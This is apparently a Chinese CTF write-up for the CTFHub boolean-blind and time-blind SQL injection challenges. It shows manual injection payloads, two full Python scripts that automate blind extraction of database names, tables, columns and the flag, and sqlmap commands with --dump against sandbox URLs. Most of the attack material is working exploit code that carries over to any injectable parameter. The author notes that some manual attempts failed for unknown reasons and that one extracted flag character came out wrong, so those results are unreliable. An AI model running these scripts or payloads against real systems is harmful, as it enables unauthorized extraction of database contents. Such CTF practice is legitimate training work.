布尔盲注
盲注原理:
将自己的注入语句使用and与?id=1并列,完成注入
手工注入:
爆库名长度
首先通过折半查找的方法,通过界面的回显结果找出数据库名字的长度,并通过相同的方法依次找到数据库名字的每个字符、列名,然后再找到flag
输入“1”
成功回显
通过循环i从1到无穷,使用length(database()) = i获取库名长度,i是长度,直到返回页面提示query_success即猜测成功
1 and length(database())=1
1 and length(database())=1
根据库名长度爆库名
获得库名长度i后,使用substr(database(),i,1)将库名切片,循环i次,i是字符下标,每次循环要遍历字母表[a-z]作比较,即依次猜每位字符
1 and substr(database(),1,1)=‘a’
一直尝试
1 and substr(database(),1,1)=‘s’
在这里尝试很多次,却一直显示错误回显。原因目前还未知。具体操作可以看这位大佬
CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写_ctfhub布尔盲注-CSDN博客
看题解得知,库名为sqli
对当前库爆表数量
1 and (select COUNT(*) from information_schema.tables where table_schema=database())=1
1 and (select COUNT(*) from information_schema.tables where table_schema=database())=2
库sqli里有两张表
根据库名和表数量爆表名长度
?id=1 and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=1
1 and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=4
库sqli有两张表’news’和’flag‘,表名长度均为4
根据表名长度爆表名
1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘a’
1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘n’
不断尝试
1 and substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)=‘f’
1 and substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1)=‘g’
对表爆列数量
1 and (select count(column_name) from information_schema.columns where table_name='flag')=1
根据表名和列数量爆列名长度
1 and length(select columns from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1)=1
根据列名长度爆列名
1 and substr((select columns_name from information_schema.columns where table_schema=database() and table_name=‘flag’ limit 0,1),1,1)=‘a’
根据列名爆数据值
1 and substr((select flag from sqli.flag),1,1)=“a”
CTFHub-web(sql布尔盲注)_ctf 布尔盲注-CSDN博客
CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写_ctfhub布尔盲注-CSDN博客
python脚本解题
大神写的python脚本
注意修改url码后,直接运行即可
#导入库
import requests
#设定环境URL,由于每次开启环境得到的URL都不同,需要修改!
url = 'http://challenge-97e9192406bc1be6.sandbox.ctfhub.com:10800/'
#作为盲注成功的标记,成功页面会显示query_success
success_mark = "query_success"
#把字母表转化成ascii码的列表,方便便利,需要时再把ascii码通过chr(int)转化成字母
ascii_range = range(ord('a'),1+ord('z'))
#flag的字符范围列表,包括花括号、a-z,数字0-9
str_range = [123,125] + list(ascii_range) + list(range(48,58))
#自定义函数获取数据库名长度
def getLengthofDatabase():
#初始化库名长度为1
i = 1
#i从1开始,无限循环库名长度
while True:
new_url = url + "?id=1 and length(database())={}".format(i)
#GET请求
r = requests.get(new_url)
#如果返回的页面有query_success,即盲猜成功即跳出无限循环
if success_mark in r.text:
#返回最终库名长度
return i
#如果没有匹配成功,库名长度+1接着循环
i = i + 1
#自定义函数获取数据库名
def getDatabase(length_of_database):
#定义存储库名的变量
name = ""
#库名有多长就循环多少次
for i in range(length_of_database):
#切片,对每一个字符位遍历字母表
#i+1是库名的第i+1个字符下标,j是字符取值a-z
for j in ascii_range:
new_url = url + "?id=1 and substr(database(),{},1)='{}'".format(i+1,chr(j))
r = requests.get(new_url)
if success_mark in r.text:
#匹配到就加到库名变量里
name += chr(j)
#当前下标字符匹配成功,退出遍历,对下一个下标进行遍历字母表
break
#返回最终的库名
return name
#自定义函数获取指定库的表数量
def getCountofTables(database):
#初始化表数量为1
i = 1
#i从1开始,无限循环
while True:
new_url = url + "?id=1 and (select count(*) from information_schema.tables where table_schema='{}')={}".format(database,i)
r = requests.get(new_url)
if success_mark in r.text:
#返回最终表数量
return i
#如果没有匹配成功,表数量+1接着循环
i = i + 1
#自定义函数获取指定库所有表的表名长度
def getLengthListofTables(database,count_of_tables):
#定义存储表名长度的列表
#使用列表是考虑表数量不为1,多张表的情况
length_list=[]
#有多少张表就循环多少次
for i in range(count_of_tables):
#j从1开始,无限循环表名长度
j = 1
while True:
#i+1是第i+1张表
new_url = url + "?id=1 and length((select table_name from information_schema.tables where table_schema='{}' limit {},1))={}".format(database,i,j)
r = requests.get(new_url)
if success_mark in r.text:
#匹配到就加到表名长度的列表
length_list.append(j)
break
#如果没有匹配成功,表名长度+1接着循环
j = j + 1
#返回最终的表名长度的列表
return length_list
#自定义函数获取指定库所有表的表名
def getTables(database,count_of_tables,length_list):
#定义存储表名的列表
tables=[]
#表数量有多少就循环多少次
for i in range(count_of_tables):
#定义存储表名的变量
name = ""
#表名有多长就循环多少次
#表长度和表序号(i)一一对应
for j in range(length_list[i]):
#k是字符取值a-z
for k in ascii_range:
new_url = url + "?id=1 and substr((select table_name from information_schema.tables where table_schema='{}' limit {},1),{},1)='{}'".format(database,i,j+1,chr(k))
r = requests.get(new_url)
if success_mark in r.text:
#匹配到就加到表名变量里
name = name + chr(k)
break
#添加表名到表名列表里
tables.append(name)
#返回最终的表名列表
return tables
#自定义函数获取指定表的列数量
def getCountofColumns(table):
#初始化列数量为1
i = 1
#i从1开始,无限循环
while True:
new_url = url + "?id=1 and (select count(*) from information_schema.columns where table_name='{}')={}".format(table,i)
r = requests.get(new_url)
if success_mark in r.text:
#返回最终列数量
return i
#如果没有匹配成功,列数量+1接着循环
i = i + 1
#自定义函数获取指定库指定表的所有列的列名长度
def getLengthListofColumns(database,table,count_of_column):
#定义存储列名长度的变量
#使用列表是考虑列数量不为1,多个列的情况
length_list=[]
#有多少列就循环多少次
for i in range(count_of_column):
#j从1开始,无限循环列名长度
j = 1
while True:
new_url = url + "?id=1 and length((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1))={}".format(database,table,i,j)
r = requests.get(new_url)
if success_mark in r.text:
#匹配到就加到列名长度的列表
length_list.append(j)
break
#如果没有匹配成功,列名长度+1接着循环
j = j + 1
#返回最终的列名长度的列表
return length_list
#自定义函数获取指定库指定表的所有列名
def getColumns(database,table,count_of_columns,length_list):
#定义存储列名的列表
columns = []
#列数量有多少就循环多少次
for i in range(count_of_columns):
#定义存储列名的变量
name = ""
#列名有多长就循环多少次
#列长度和列序号(i)一一对应
for j in range(length_list[i]):
for k in ascii_range:
new_url = url + "?id=1 and substr((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1),{},1)='{}'".format(database,table,i,j+1,chr(k))
r = requests.get(new_url)
if success_mark in r.text:
#匹配到就加到列名变量里
name = name + chr(k)
break
#添加列名到列名列表里
columns.append(name)
#返回最终的列名列表
return columns
#对指定库指定表指定列爆数据(flag)
def getData(database,table,column,str_list):
#初始化flag长度为1
j = 1
#j从1开始,无限循环flag长度
while True:
#flag中每一个字符的所有可能取值
for i in str_list:
new_url = url + "?id=1 and substr((select {} from {}.{}),{},1)='{}'".format(column,database,table,j,chr(i))
r = requests.get(new_url)
#如果返回的页面有query_success,即盲猜成功,跳过余下的for循环
if success_mark in r.text:
#显示flag
print(chr(i),end="")
#flag的终止条件,即flag的尾端右花括号
if chr(i) == "}":
print()
return 1
break
#如果没有匹配成功,flag长度+1接着循环
j = j + 1
#--主函数--
if __name__ == '__main__':
#爆flag的操作
#还有仿sqlmap的UI美化
print("Judging the number of tables in the database...")
database = getDatabase(getLengthofDatabase())
count_of_tables = getCountofTables(database)
print("[+]There are {} tables in this database".format(count_of_tables))
print()
print("Getting the table name...")
length_list_of_tables = getLengthListofTables(database,count_of_tables)
tables = getTables(database,count_of_tables,length_list_of_tables)
for i in tables:
print("[+]{}".format(i))
print("The table names in this database are : {}".format(tables))
#选择所要查询的表
i = input("Select the table name:")
if i not in tables:
print("Error!")
exit()
print()
print("Getting the column names in the {} table......".format(i))
count_of_columns = getCountofColumns(i)
print("[+]There are {} tables in the {} table".format(count_of_columns,i))
length_list_of_columns = getLengthListofColumns(database,i,count_of_columns)
columns = getColumns(database,i,count_of_columns,length_list_of_columns)
print("[+]The column(s) name in {} table is:{}".format(i,columns))
#选择所要查询的列
j = input("Select the column name:")
if j not in columns:
print("Error!")
exit()
print()
print("Getting the flag......")
print("[+]The flag is ",end="")
getData(database,i,j,str_range)
在SELECT the table name:后面输入flag
爆破结束后,得到flagCTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写_ctfhub布尔盲注-CSDN博客
sqlmap解题
CTFHub-web(sql布尔盲注)_ctf 布尔盲注-CSDN博客
CTFHub技能树web(持续更新)--SQL注入--布尔盲注_ctfhub布尔盲注-CSDN博客
在Kali Linux里面使用sqlmap工具
数据库名称
sqlmap -u "http://challenge-7b1f32e875471cc5.sandbox.ctfhub.com:10800/?id=1" --dbs
数据表名称
sqlmap -u "http://challenge-7b1f32e875471cc5.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables
字段,flag
sqlmap -u "http://challenge-7b1f32e875471cc5.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --columns --dump
得到flag
或者分步查询
列
sqlmap -u "http://challenge-7b1f32e875471cc5.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --columns
字段
sqlmap -u "http://challenge-7b1f32e875471cc5.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag -C flag --dump
得到flag
时间盲注
sqlmap解题
CTFHub-web(sql时间盲注)_ctfhub 时间盲注-CSDN博客
http://challenge-2b6513b99f9a0338.sandbox.ctfhub.com:10800
数据库名称
sqlmap -u "http://challenge-2b6513b99f9a0338.sandbox.ctfhub.com:10800/?id=1" --dbs
数据表名称
sqlmap -u "http://challenge-2b6513b99f9a0338.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables
字段名,flag
sqlmap -u "http://challenge-2b6513b99f9a0338.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --columns --dump
python脚本解题
CTFHub_技能树_Web之SQL注入——时间盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写_ctfhub时间盲注-CSDN博客
import requests
from time import perf_counter
# 设定环境URL,由于每次开启环境得到的URL都不同,需要修改!
url = 'http://challenge-2b6513b99f9a0338.sandbox.ctfhub.com:10800/'
rs = requests.session()
# 把字母表转化成ascii码的列表,方便便利,需要时再把ascii码通过chr(int)转化成字母
ascii_range = range(ord('a'), 1 + ord('z'))
# flag的字符范围列表,包括花括号、横杠、a-z、数字0-9
flag_range = [45, 123, 125] + list(ascii_range) + list(range(48, 58))
# 获取指定库中表的数量
def get_count_of_tables():
i = 1
while True:
whole_url = url + '?id=1 and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(0.5),1)'.format(i)
t1 = perf_counter()
rs.get(whole_url)
t = perf_counter() - t1
if t > 0.5:
return i
i = i + 1
# 获取指定库所有表的表名长度的列表
def get_length_list_of_tables():
count_of_tables = get_count_of_tables()
length_list = []
for i in range(count_of_tables):
j = 1
while True:
whole_url = url + '?id=1 and if(length((select table_name from information_schema.tables where table_schema=database() limit {},1))={},sleep(0.5),1)'.format(i, j)
t1 = perf_counter()
rs.get(whole_url)
t = perf_counter() -t1
if t > 0.5:
length_list.append(j)
break
j = j + 1
return count_of_tables, length_list
# 获取指定库的所有表名列表
def get_tables():
count_of_tables, length_list = get_length_list_of_tables()
name_of_tables = []
for i in range(count_of_tables):
name = ''
for j in range(length_list[i]):
for k in ascii_range:
whole_url = url + '?id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={},sleep(0.5),1)'.format(i, j+1, k)
t1 = perf_counter()
rs.get(whole_url)
t = perf_counter() - t1
if t > 0.5:
name = name + chr(k)
break
name_of_tables.append(name)
return name_of_tables
# 获取指定表中列的数量
def get_count_of_columns(name_of_table):
i = 1
while True:
whole_url = url + '?id=1 and if((select count(*) from information_schema.columns where table_schema=database() and table_name="{}")={},sleep(0.5),1)'.format(name_of_table, i)
t1 = perf_counter()
rs.get(whole_url)
t = perf_counter() - t1
if t > 0.5:
return i
i = i + 1
# 获取指定表所有列的列名长度列表
def get_length_list_of_columns(name_of_table):
count_of_columns = get_count_of_columns(name_of_table)
length_list = []
for i in range(count_of_columns):
j = 1
while True:
whole_url = url + '?id=1 and if(length((select column_name from information_schema.columns where table_schema=database() and table_name="{}" limit {},1))={},sleep(0.5),1)'.format(name_of_table, i, j)
t1 = perf_counter()
rs.get(whole_url)
t = perf_counter() - t1
if t > 0.5:
length_list.append(j)
break
j = j + 1
return count_of_columns, length_list
# 获取指定库的所有列名列表
def get_columns(name_of_table):
count_of_columns, length_list = get_length_list_of_columns(name_of_table)
columns = []
for i in range(count_of_columns):
name = ''
for j in range(length_list[i]):
for k in ascii_range:
whole_url = url + '?id=1 and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="{}" limit {},1),{},1))={},sleep(0.5),1)'.format(name_of_table, i, j+1, k)
t1 = perf_counter()
rs.get(whole_url)
t = perf_counter() - t1
if t > 0.5:
name = name + chr(k)
break
columns.append(name)
return columns
# 爆flag
def get_flag(name_of_table, name_of_column):
i = 1
while True:
for j in flag_range:
whole_url = url + '?id=1 and if(ascii(substr((select {} from {}),{},1))={},sleep(0.5),1)'.format(name_of_column,name_of_table, i, j)
t1 = perf_counter()
rs.get(whole_url)
t = perf_counter() - t1
if t > 0.5:
print(chr(j), end="")
if chr(j) == '}':
print()
return 1
break
i = i + 1
def main():
print("Judging the database...")
print()
print("Getting the table name...")
tables = get_tables()
for i in tables:
print("[+]{}".format(i))
print("The table names in this database are : {}".format(tables))
table = input("Select the Table name:")
if table not in tables:
print("Error!")
exit()
print()
print("Getting the column names in the {} table......".format(table))
columns = get_columns(table)
for i in columns:
print("[+]{}".format(i))
print("The column names in {} are : {}".format(table, columns))
column = input("Select the Column name:")
if column not in columns:
print("Error!")
exit()
print()
print("Getting the flag......")
print("[+]The flag is ", end="")
get_flag(table, column)
if __name__ == '__main__':
main()
运行脚本
输入flag后回车运行
得到flag
但是提交时提示flag错误
ctfhub{1b8e7af8-da83e4e030a879c}
ctfhub{1b8e7af84da83e4e030a879c}
经研究之后,发现为其中一个字符爆破错误,原因暂时还未知。